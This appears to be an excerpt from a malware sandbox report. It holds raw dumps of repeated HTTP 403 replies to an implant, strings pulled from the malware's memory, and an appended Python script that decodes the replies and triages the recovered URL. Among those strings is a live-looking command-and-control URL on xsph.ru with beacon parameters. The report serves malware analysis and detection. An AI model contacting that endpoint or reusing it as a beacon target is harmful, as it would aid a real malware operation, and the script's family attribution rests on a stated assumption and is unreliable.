Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: eight further HTTP/1.1 403 Forbidden responses with identical headers (Server: openresty, Content-Type: text/html, Transfer-Encoding: chunked, Connection: keep-alive, Vary: Accept-Encoding) and a byte-for-byte identical body, differing only in the Date header: Sun, 24 Nov 2024 03:03:29 GMT (twice), 03:03:37 GMT, 03:03:38 GMT, 03:03:44 GMT, 03:03:45 GMT and 03:04:03 GMT (twice). The repeated raw dumps are omitted; the implant re-contacted the server roughly every 10 to 20 seconds and was refused every time.
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1043195.xsph.ru
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.0000000002771000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1043195.xsph.ru/
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001D.00000002.2168378706.0000000000968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.mic
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru/auth/login
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://index.from.sh/pages/game.html
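The 403 responses and the C2 URL above, decoded and triaged in Python, as an added example that is not part of the sandbox report. RAW_HEX is the body prefix the sandbox recorded for the first 403 (already truncated by the sandbox), and C2_URL is the URL recovered from mnUYCZffXdEgQlZPiczLektp.exe memory, copied as recorded (its last value may itself be cut short). The "random-looking parameter name" heuristic is our own assumption about how this family builds its query strings, not a vendor rule.

```python
"""Decode a captured chunked HTTP 403 body and triage the recovered C2 URL.

Added example for this report, not sandbox output. RAW_HEX and C2_URL are
copied from the report; everything else is our own logic and assumptions.
"""
import re
from urllib.parse import parse_qsl, urlparse

# Prefix of the first 403 body as the sandbox dumped it (chunk-size line + HTML start).
RAW_HEX = (
    "64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 "
    "6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 "
    "3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 "
    "20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 "
    "30 3c 2f 74 69 74 6c 65 3e 0a"
)
# C2 URL as recovered from process memory (may be truncated at the end).
C2_URL = ("http://a1043195.xsph.ru/e561840a.php"
          "?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R")


def decode_chunk_prefix(raw_hex: str) -> dict:
    """Parse one chunked-encoding chunk: hex size line, CRLF, then captured body."""
    raw = bytes.fromhex(raw_hex)          # whitespace between byte pairs is ignored
    size_line, sep, body = raw.partition(b"\r\n")
    if not sep:
        raise ValueError("no CRLF after chunk-size line")
    declared = int(size_line.decode("ascii"), 16)
    text = body.decode("utf-8", errors="replace")
    m = re.search(r"<title>(.*?)</title>", text, re.S)
    title = m.group(1) if m else ""
    return {
        "declared_size": declared,
        "captured": len(body),
        "truncated": len(body) < declared,
        "title": title,
        # Cyrillic in the title points at a hoster error page in Russian, not C2 data.
        "cyrillic_title": any("\u0400" <= ch <= "\u04ff" for ch in title),
        "body": text,
    }


def looks_random(token: str) -> bool:
    """Mixed-case alphanumeric token, our assumed shape for generated parameter names."""
    return (len(token) >= 6 and token.isalnum()
            and any(c.isupper() for c in token)
            and any(c.islower() for c in token))


def triage_c2_url(url: str) -> dict:
    """Summarise the traits a hunter would pivot on: host, PHP endpoint, opaque params."""
    p = urlparse(url)
    params = parse_qsl(p.query, keep_blank_values=True)
    php_endpoint = p.path.lower().endswith(".php")
    all_random = bool(params) and all(looks_random(k) for k, _ in params)
    return {
        "host": p.hostname,
        "php_endpoint": php_endpoint,
        "param_count": len(params),
        "all_params_random": all_random,
        # Heuristic (assumption): PHP gate plus only opaque parameter names.
        "dcrat_style": php_endpoint and all_random,
    }


if __name__ == "__main__":
    r = decode_chunk_prefix(RAW_HEX)
    print(f"chunk declares {r['declared_size']} bytes, captured {r['captured']}, "
          f"truncated={r['truncated']}, title={r['title']!r}")
    print(triage_c2_url(C2_URL))
```

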